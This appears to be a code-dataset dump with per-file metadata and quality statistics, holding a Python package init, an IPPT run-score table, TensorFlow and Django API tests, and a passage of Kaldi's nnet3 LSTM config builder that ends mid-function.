| 0.032258
| 0
| 0.064516
| 0.096774
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
762f43a45709e4aca6638fe5ab5a90eec01f00ef
| 202
|
py
|
Python
|
src/deepmem/__init__.py
|
mihirkatare/DeepMEM
|
6aadf3eece908a73db3399e1389990e392f3a282
|
[
"Apache-2.0"
] | 2
|
2021-06-02T15:56:40.000Z
|
2021-06-02T16:02:21.000Z
|
src/deepmem/__init__.py
|
mihirkatare/DeepMEM
|
6aadf3eece908a73db3399e1389990e392f3a282
|
[
"Apache-2.0"
] | 15
|
2021-06-04T02:05:45.000Z
|
2021-10-18T07:05:47.000Z
|
src/deepmem/__init__.py
|
mihirkatare/DeepMEM
|
6aadf3eece908a73db3399e1389990e392f3a282
|
[
"Apache-2.0"
] | null | null | null |
from deepmem import data, model, networks, utils
from deepmem._version import version as __version__
__all__ = ["__version__", "data", "model", "networks", "utils"]
def __dir__():
    """Limit the module's dir() listing to the public API declared in __all__."""
    return __all__
| 22.444444
| 63
| 0.727723
| 24
| 202
| 5.25
| 0.541667
| 0.174603
| 0.269841
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153465
| 202
| 8
| 64
| 25.25
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0.163366
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
521db984018f2987acd05d7c8724a41e52747cb0
| 10,681
|
py
|
Python
|
calculator/data/run.py
|
ninest/IPPT
|
5fa8ac4156156e5a97b6d99b7055b5e6b1aee4aa
|
[
"MIT"
] | 4
|
2020-10-15T05:30:50.000Z
|
2022-03-22T17:03:12.000Z
|
calculator/data/run.py
|
ninest/IPPT
|
5fa8ac4156156e5a97b6d99b7055b5e6b1aee4aa
|
[
"MIT"
] | 1
|
2020-09-11T16:22:38.000Z
|
2020-10-12T07:47:14.000Z
|
calculator/data/run.py
|
ninest/IPPT
|
5fa8ac4156156e5a97b6d99b7055b5e6b1aee4aa
|
[
"MIT"
] | null | null | null |
running_score_table = [
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
46,
48,
49,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
46,
48,
49,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
46,
48,
49,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
[
0,
1,
2,
4,
6,
8,
10,
12,
14,
16,
18,
20,
22,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
35,
35,
36,
36,
37,
37,
38,
38,
39,
39,
40,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
50,
],
]
# Candidate run timings, descending from 1100 to 510 in steps of 10
# (60 entries, matching the 60 columns of each running_score_table row).
# Presumably these are 2.4 km run times in seconds — confirm against the
# calculator that consumes this module.
run_times = list(range(1100, 500, -10))
| 11.43576
| 23
| 0.161408
| 905
| 10,681
| 1.901657
| 0.119337
| 0.105752
| 0.135967
| 0.153399
| 0.874492
| 0.874492
| 0.874492
| 0.874492
| 0.874492
| 0.874492
| 0
| 0.634731
| 0.749836
| 10,681
| 933
| 24
| 11.448017
| 0.009356
| 0
| 0
| 0.916309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
528cc5943a8a10aa3b8f479a33e88f6efe84c3cd
| 2,425
|
py
|
Python
|
tests/inferbeddings/model/test_embeddings.py
|
issca/inferbeddings
|
80492a7aebcdcac21e758514c8af403d77e8594a
|
[
"MIT"
] | 33
|
2017-07-25T14:31:00.000Z
|
2019-03-06T09:18:00.000Z
|
tests/inferbeddings/model/test_embeddings.py
|
issca/inferbeddings
|
80492a7aebcdcac21e758514c8af403d77e8594a
|
[
"MIT"
] | 1
|
2017-08-22T13:49:30.000Z
|
2017-08-22T13:49:30.000Z
|
tests/inferbeddings/model/test_embeddings.py
|
issca/inferbeddings
|
80492a7aebcdcac21e758514c8af403d77e8594a
|
[
"MIT"
] | 9
|
2017-10-05T08:50:45.000Z
|
2019-04-18T12:40:56.000Z
|
# -*- coding: utf-8 -*-
import pytest
import numpy as np
import tensorflow as tf
import inferbeddings.models.embeddings as embeddings
def test_additive_walk_embedding():
    """The additive walk embedding must equal a sum over the walk axis."""
    batch_size, walk_length, embedding_size = 5, 3, 10
    rng = np.random.RandomState(0)
    P = rng.rand(batch_size, walk_length, embedding_size)
    vW = embeddings.additive_walk_embedding(tf.Variable(P, name='P'))
    with tf.Session() as session:
        session.run(tf.global_variables_initializer())
        swe = session.run(vW)
        assert swe.shape[0] == batch_size
        assert np.allclose(swe, np.sum(P, axis=1))
    # Leave a clean graph for the next test.
    tf.reset_default_graph()
def test_additive_walk_embedding_zeros():
    """A zero-length walk must reduce to the empty sum over the walk axis."""
    batch_size, walk_length, embedding_size = 5, 0, 10
    rng = np.random.RandomState(0)
    P = rng.rand(batch_size, walk_length, embedding_size)
    vW = embeddings.additive_walk_embedding(tf.Variable(P, name='P'))
    with tf.Session() as session:
        session.run(tf.global_variables_initializer())
        swe = session.run(vW)
        assert swe.shape[0] == batch_size
        assert np.allclose(swe, np.sum(P, axis=1))
    # Leave a clean graph for the next test.
    tf.reset_default_graph()
def test_bilinear_diagonal_walk_embedding():
    """The bilinear-diagonal embedding must equal a product over the walk axis."""
    batch_size, walk_length, embedding_size = 5, 3, 10
    rng = np.random.RandomState(0)
    P = rng.rand(batch_size, walk_length, embedding_size)
    vW = embeddings.bilinear_diagonal_walk_embedding(tf.Variable(P, name='P'))
    with tf.Session() as session:
        session.run(tf.global_variables_initializer())
        swe = session.run(vW)
        assert swe.shape[0] == batch_size
        assert np.allclose(swe, np.prod(P, axis=1))
    # Leave a clean graph for the next test.
    tf.reset_default_graph()
def test_bilinear_walk_embedding():
    """A single-step walk must be returned as the (reshaped) input itself."""
    batch_size, walk_length, embedding_size = 1, 1, 25
    rng = np.random.RandomState(0)
    P = rng.rand(batch_size, walk_length, embedding_size)
    # The second argument is the matrix side length: sqrt(25) == 5.
    vW = embeddings.bilinear_walk_embedding(tf.Variable(P, name='P'),
                                            int(np.sqrt(embedding_size)))
    with tf.Session() as session:
        session.run(tf.global_variables_initializer())
        swe = session.run(vW)
        assert swe.shape[0] == batch_size
        assert np.allclose(swe, P.reshape(1, 5, 5))
    # Leave a clean graph for the next test.
    tf.reset_default_graph()
if __name__ == '__main__':
    # Allow running this module directly (python test_embeddings.py)
    # instead of going through the pytest CLI.
    pytest.main([__file__])
| 24.25
| 77
| 0.664742
| 345
| 2,425
| 4.417391
| 0.182609
| 0.070866
| 0.055118
| 0.055118
| 0.822835
| 0.799213
| 0.799213
| 0.799213
| 0.776247
| 0.776247
| 0
| 0.016324
| 0.216907
| 2,425
| 99
| 78
| 24.494949
| 0.786203
| 0.00866
| 0
| 0.727273
| 0
| 0
| 0.004996
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 1
| 0.060606
| false
| 0
| 0.060606
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfdcd366c8ea993353b0692302c7534694c0b448
| 6,682
|
py
|
Python
|
rdmo/projects/tests/test_viewset_project_integration.py
|
cbittner/rdmo
|
1d6885ad2a69f6d24c9fca6446536e0c06de5486
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_viewset_project_integration.py
|
cbittner/rdmo
|
1d6885ad2a69f6d24c9fca6446536e0c06de5486
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_viewset_project_integration.py
|
cbittner/rdmo
|
1d6885ad2a69f6d24c9fca6446536e0c06de5486
|
[
"Apache-2.0"
] | null | null | null |
import json
import pytest
from django.urls import reverse
from ..models import Integration
# (username, password) pairs covering every permission role exercised by the
# parametrized tests below; 'anonymous' logs in with no credentials.
users = (
    ('owner', 'owner'),
    ('manager', 'manager'),
    ('author', 'author'),
    ('guest', 'guest'),
    ('api', 'api'),
    ('user', 'user'),
    ('site', 'site'),
    ('anonymous', None),
)
# Expected HTTP status per action and role. 404 (rather than 403) hides the
# project's existence from roles without access.
status_map = {
    'list': {
        'owner': 200, 'manager': 200, 'author': 404, 'guest': 404, 'api': 200, 'user': 404, 'site': 200, 'anonymous': 404
    },
    'detail': {
        'owner': 200, 'manager': 200, 'author': 404, 'guest': 404, 'api': 200, 'user': 404, 'site': 200, 'anonymous': 404
    },
    'create': {
        'owner': 201, 'manager': 201, 'author': 404, 'guest': 404, 'api': 201, 'user': 404, 'site': 201, 'anonymous': 404
    },
    'update': {
        'owner': 200, 'manager': 200, 'author': 404, 'guest': 404, 'api': 200, 'user': 404, 'site': 200, 'anonymous': 404
    },
    'delete': {
        'owner': 204, 'manager': 204, 'author': 404, 'guest': 404, 'api': 204, 'user': 404, 'site': 204, 'anonymous': 404
    }
}
# Reversible URL names for the project-integration endpoints under test.
urlnames = {
    'list': 'v1-projects:project-integration-list',
    'detail': 'v1-projects:project-integration-detail'
}
# Fixture ids — presumably provided by the test database fixtures; confirm
# against the project's conftest/fixture data.
site_id = 1
project_id = 1
@pytest.mark.parametrize('username,password', users)
def test_list(db, client, username, password):
    """GET the integration list endpoint; check status and payload shape."""
    client.login(username=username, password=password)
    response = client.get(reverse(urlnames['list'], args=[project_id]))
    assert response.status_code == status_map['list'][username], response.json()
    if response.status_code == 200:
        payload = response.json()
        assert isinstance(payload, list)
        assert len(payload) == 1
@pytest.mark.parametrize('username,password', users)
def test_detail(db, client, username, password):
    """GET each integration's detail endpoint; check status and returned id."""
    client.login(username=username, password=password)
    for instance in Integration.objects.filter(project_id=project_id):
        url = reverse(urlnames['detail'], args=[project_id, instance.pk])
        response = client.get(url)
        assert response.status_code == status_map['detail'][username], response.json()
        if response.status_code == 200:
            assert response.json().get('id') == instance.id
@pytest.mark.parametrize('username,password', users)
def test_create(db, client, username, password):
    """POST a valid integration; check the per-role expected status."""
    client.login(username=username, password=password)
    url = reverse(urlnames['list'], args=[project_id])
    payload = {
        'provider_key': 'github',
        'options': [{'key': 'repo', 'value': 'example/example'}]
    }
    response = client.post(url, data=json.dumps(payload), content_type="application/json")
    assert response.status_code == status_map['create'][username], response.json()
@pytest.mark.parametrize('username,password', users)
def test_create_error1(db, client, username, password):
    """POST an unknown provider_key: roles that may create must get a 400
    with a provider_key error; others get their usual status."""
    client.login(username=username, password=password)
    url = reverse(urlnames['list'], args=[project_id])
    payload = {
        'provider_key': 'wrong',
        'options': [{'key': 'repo', 'value': 'example/example'}]
    }
    response = client.post(url, data=json.dumps(payload), content_type="application/json")
    expected = status_map['create'][username]
    if expected == 201:
        assert response.status_code == 400, response.json()
        assert response.json()['provider_key'], response.json()
    else:
        assert response.status_code == expected, response.json()
@pytest.mark.parametrize('username,password', users)
def test_create_error2(db, client, username, password):
    """POST an empty option value: roles that may create must get a 400
    with a value error on the option; others get their usual status."""
    client.login(username=username, password=password)
    url = reverse(urlnames['list'], args=[project_id])
    payload = {
        'provider_key': 'github',
        'options': [{'key': 'repo', 'value': ''}]
    }
    response = client.post(url, data=json.dumps(payload), content_type="application/json")
    expected = status_map['create'][username]
    if expected == 201:
        assert response.status_code == 400, response.json()
        assert response.json()['options'][0]['value'], response.json()
    else:
        assert response.status_code == expected, response.json()
@pytest.mark.parametrize('username,password', users)
def test_create_error3(db, client, username, password):
    """POST an unsupported option key ('foo'): roles that may create must
    get a 400 flagging that key; others get their usual status."""
    client.login(username=username, password=password)
    url = reverse(urlnames['list'], args=[project_id])
    payload = {
        'provider_key': 'github',
        'options': [
            {'key': 'repo', 'value': 'example/example'},
            {'key': 'foo', 'value': 'bar'}
        ]
    }
    response = client.post(url, data=json.dumps(payload), content_type="application/json")
    expected = status_map['create'][username]
    if expected == 201:
        assert response.status_code == 400, response.json()
        assert 'foo' in response.json()['options'][0], response.json()
    else:
        assert response.status_code == expected, response.json()
@pytest.mark.parametrize('username,password', users)
def test_update(db, client, username, password):
    """PUT new options on each integration; on success the stored options
    must contain the new repo value plus an (empty) secret entry."""
    client.login(username=username, password=password)
    for instance in Integration.objects.filter(project_id=project_id):
        url = reverse(urlnames['detail'], args=[project_id, instance.pk])
        payload = {
            'provider_key': 'github',
            'options': [{'key': 'repo', 'value': 'example/test'}]
        }
        response = client.put(url, payload, content_type='application/json')
        assert response.status_code == status_map['update'][username], response.json()
        if response.status_code == 200:
            options = sorted(response.json().get('options'), key=lambda obj: obj['key'])
            assert options == [
                {'key': 'repo', 'value': 'example/test'},
                {'key': 'secret', 'value': ''}
            ]
@pytest.mark.parametrize('username,password', users)
def test_delete(db, client, username, password):
    """DELETE each integration; check the per-role expected status."""
    client.login(username=username, password=password)
    for instance in Integration.objects.filter(project_id=project_id):
        url = reverse(urlnames['detail'], args=[project_id, instance.pk])
        response = client.delete(url)
        assert response.status_code == status_map['delete'][username], response.content
| 32.436893
| 121
| 0.586501
| 707
| 6,682
| 5.452617
| 0.12447
| 0.099611
| 0.06537
| 0.068482
| 0.816861
| 0.799481
| 0.799481
| 0.790143
| 0.777432
| 0.6869
| 0
| 0.031444
| 0.252769
| 6,682
| 205
| 122
| 32.595122
| 0.740637
| 0
| 0
| 0.488095
| 0
| 0
| 0.158785
| 0.011075
| 0
| 0
| 0
| 0
| 0.107143
| 1
| 0.047619
| false
| 0.142857
| 0.02381
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
87323a1c3e19e57023590d72ab84e2d8fba6ed7d
| 23,058
|
py
|
Python
|
egs/wsj/s5/steps/nnet3/components.py
|
mnjagtap/Kaldi-branch
|
b4780574cf18f29fb9851826d0645370e08d6121
|
[
"Apache-2.0"
] | 32
|
2016-11-30T04:51:29.000Z
|
2021-06-13T09:16:59.000Z
|
egs/wsj/s5/steps/nnet3/components.py
|
mnjagtap/Kaldi-branch
|
b4780574cf18f29fb9851826d0645370e08d6121
|
[
"Apache-2.0"
] | null | null | null |
egs/wsj/s5/steps/nnet3/components.py
|
mnjagtap/Kaldi-branch
|
b4780574cf18f29fb9851826d0645370e08d6121
|
[
"Apache-2.0"
] | 10
|
2016-07-12T12:39:57.000Z
|
2021-08-31T03:00:23.000Z
|
#!/usr/bin/env python
from __future__ import print_function
import os
import argparse
import sys
import warnings
import copy
def AddInputLayer(config_lines, feat_dim, splice_indexes=(0,), ivector_dim=0):
    """Add the input (and optional i-vector) nodes and return the spliced descriptor.

    config_lines: dict with 'components' and 'component-nodes' lists (mutated in place)
    feat_dim: dimension of the 'input' node
    splice_indexes: time offsets to splice together (0 means the current frame);
        default changed from a mutable list to an equivalent tuple
    ivector_dim: if > 0, an 'ivector' input node is added and appended to the splice
    Returns {'descriptor': ..., 'dimension': ...} describing the spliced output.
    """
    components = config_lines['components']
    components.append('input-node name=input dim=' + str(feat_dim))
    # renamed from 'list', which shadowed the builtin
    spliced_inputs = [('Offset(input, {0})'.format(n) if n != 0 else 'input')
                      for n in splice_indexes]
    output_dim = len(splice_indexes) * feat_dim
    if ivector_dim > 0:
        components.append('input-node name=ivector dim=' + str(ivector_dim))
        # the i-vector is taken at t=0 regardless of the frame being computed
        spliced_inputs.append('ReplaceIndex(ivector, t, 0)')
        output_dim += ivector_dim
    splice_descriptor = "Append({0})".format(", ".join(spliced_inputs))
    print(splice_descriptor)
    return {'descriptor': splice_descriptor,
            'dimension': output_dim}
def AddLdaLayer(config_lines, name, input, lda_file):
    """Append a FixedAffineComponent whose matrix is loaded from lda_file.

    The output dimension equals the input dimension.
    """
    descriptor = '{0}_lda'.format(name)
    config_lines['components'].append(
        'component name={0} type=FixedAffineComponent matrix={1}'.format(descriptor, lda_file))
    config_lines['component-nodes'].append(
        'component-node name={0} component={0} input={1}'.format(descriptor, input['descriptor']))
    return {'descriptor': descriptor,
            'dimension': input['dimension']}
def AddAffineLayer(config_lines, name, input, output_dim, ng_affine_options = ""):
    """Append a NaturalGradientAffineComponent mapping the input to output_dim."""
    affine = '{0}_affine'.format(name)
    config_lines['components'].append(
        "component name={0} type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(
            affine, input['dimension'], output_dim, ng_affine_options))
    config_lines['component-nodes'].append(
        "component-node name={0} component={0} input={1}".format(affine, input['descriptor']))
    return {'descriptor': affine,
            'dimension': output_dim}
def AddAffRelNormLayer(config_lines, name, input, output_dim, ng_affine_options = ""):
    """Append an affine -> ReLU -> renorm trio and return the renorm output."""
    components = config_lines['components']
    nodes = config_lines['component-nodes']
    components.extend([
        "component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], output_dim, ng_affine_options),
        "component name={0}_relu type=RectifiedLinearComponent dim={1}".format(name, output_dim),
        "component name={0}_renorm type=NormalizeComponent dim={1}".format(name, output_dim),
    ])
    nodes.extend([
        "component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']),
        "component-node name={0}_relu component={0}_relu input={0}_affine".format(name),
        "component-node name={0}_renorm component={0}_renorm input={0}_relu".format(name),
    ])
    return {'descriptor': '{0}_renorm'.format(name),
            'dimension': output_dim}
def AddSoftmaxLayer(config_lines, name, input):
    """Append a LogSoftmaxComponent over the input; the dimension is unchanged."""
    log_softmax = '{0}_log_softmax'.format(name)
    config_lines['components'].append(
        "component name={0} type=LogSoftmaxComponent dim={1}".format(log_softmax, input['dimension']))
    config_lines['component-nodes'].append(
        "component-node name={0} component={0} input={1}".format(log_softmax, input['descriptor']))
    return {'descriptor': log_softmax,
            'dimension': input['dimension']}
def AddOutputNode(config_lines, input, label_delay=None):
    """Append the network's output-node; optionally offset labels by label_delay frames."""
    if label_delay is None:
        node = 'output-node name=output input={0}'.format(input['descriptor'])
    else:
        node = 'output-node name=output input=Offset({0},{1})'.format(input['descriptor'], label_delay)
    config_lines['component-nodes'].append(node)
def AddFinalLayer(config_lines, input, output_dim, ng_affine_options = "", label_delay=None, include_softmax = "true"):
    """Add the final affine layer, an optional log-softmax, and the output node.

    include_softmax is a string flag ("true"/other) matching the script convention.
    """
    layer = AddAffineLayer(config_lines, "Final", input, output_dim, ng_affine_options)
    if include_softmax == "true":
        layer = AddSoftmaxLayer(config_lines, "Final", layer)
    AddOutputNode(config_lines, layer, label_delay)
def AddLstmLayer(config_lines,
                 name, input, cell_dim,
                 recurrent_projection_dim = 0,
                 non_recurrent_projection_dim = 0,
                 clipping_threshold = 1.0,
                 norm_based_clipping = "false",
                 ng_per_element_scale_options = "",
                 ng_affine_options = "",
                 lstm_delay = -1):
    """Add an LSTM layer (optionally projected, LSTMP-style) to the config.

    config_lines: dict with 'components' and 'component-nodes' lists (mutated in place).
    name: prefix for every component/node name (surrounding whitespace stripped).
    input: {'descriptor': ..., 'dimension': ...} of the preceding layer.
    cell_dim: LSTM cell dimension.
    recurrent_projection_dim: if 0, no recurrent projection; the recurrence then
        uses m_t directly at full cell_dim.
    non_recurrent_projection_dim: if 0, no non-recurrent projection.
    clipping_threshold, norm_based_clipping: ClipGradientComponent settings.
    ng_per_element_scale_options, ng_affine_options: extra options passed through
        to the natural-gradient components.
    lstm_delay: time offset used for the recurrent connections (default -1,
        i.e. the previous frame).
    Returns {'descriptor': ..., 'dimension': ...} for the layer output.
    """
    assert(recurrent_projection_dim >= 0 and non_recurrent_projection_dim >= 0)
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    input_descriptor = input['descriptor']
    input_dim = input['dimension']
    name = name.strip()
    if (recurrent_projection_dim == 0):
        add_recurrent_projection = False
        # no projection: the recurrence feeds back m_t at the full cell dimension
        recurrent_projection_dim = cell_dim
        recurrent_connection = "m_t"
    else:
        add_recurrent_projection = True
        recurrent_connection = "r_t"
    if (non_recurrent_projection_dim == 0):
        add_non_recurrent_projection = False
    else:
        add_non_recurrent_projection = True
    # Natural gradient per element scale parameters
    ng_per_element_scale_options += " param-mean=0.0 param-stddev=1.0 "
    # Parameter Definitions W*(* replaced by - to have valid names)
    components.append("# Input gate control : W_i* matrices")
    components.append("component name={0}_W_i-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
    components.append("# note : the cell outputs pass through a diagonal matrix")
    components.append("component name={0}_w_ic type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
    components.append("# Forget gate control : W_f* matrices")
    components.append("component name={0}_W_f-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
    components.append("# note : the cell outputs pass through a diagonal matrix")
    components.append("component name={0}_w_fc type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
    components.append("# Output gate control : W_o* matrices")
    components.append("component name={0}_W_o-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
    components.append("# note : the cell outputs pass through a diagonal matrix")
    components.append("component name={0}_w_oc type=NaturalGradientPerElementScaleComponent dim={1} {2}".format(name, cell_dim, ng_per_element_scale_options))
    components.append("# Cell input matrices : W_c* matrices")
    components.append("component name={0}_W_c-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options))
    components.append("# Defining the non-linearities")
    components.append("component name={0}_i type=SigmoidComponent dim={1}".format(name, cell_dim))
    components.append("component name={0}_f type=SigmoidComponent dim={1}".format(name, cell_dim))
    components.append("component name={0}_o type=SigmoidComponent dim={1}".format(name, cell_dim))
    components.append("component name={0}_g type=TanhComponent dim={1}".format(name, cell_dim))
    components.append("component name={0}_h type=TanhComponent dim={1}".format(name, cell_dim))
    components.append("# Defining the cell computations")
    components.append("component name={0}_c1 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
    components.append("component name={0}_c2 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
    components.append("component name={0}_m type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
    components.append("component name={0}_c type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, cell_dim, clipping_threshold, norm_based_clipping))
    # c1_t and c2_t defined below
    component_nodes.append("component-node name={0}_c_t component={0}_c input=Sum({0}_c1_t, {0}_c2_t)".format(name))
    # previous-frame cell state; IfDefined handles the start of the sequence
    c_tminus1_descriptor = "IfDefined(Offset({0}_c_t, {1}))".format(name, lstm_delay)
    component_nodes.append("# i_t")
    component_nodes.append("component-node name={0}_i1 component={0}_W_i-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_i2 component={0}_w_ic input={1}".format(name, c_tminus1_descriptor))
    component_nodes.append("component-node name={0}_i_t component={0}_i input=Sum({0}_i1, {0}_i2)".format(name))
    component_nodes.append("# f_t")
    component_nodes.append("component-node name={0}_f1 component={0}_W_f-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_f2 component={0}_w_fc input={1}".format(name, c_tminus1_descriptor))
    component_nodes.append("component-node name={0}_f_t component={0}_f input=Sum({0}_f1,{0}_f2)".format(name))
    component_nodes.append("# o_t")
    component_nodes.append("component-node name={0}_o1 component={0}_W_o-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_o2 component={0}_w_oc input={0}_c_t".format(name))
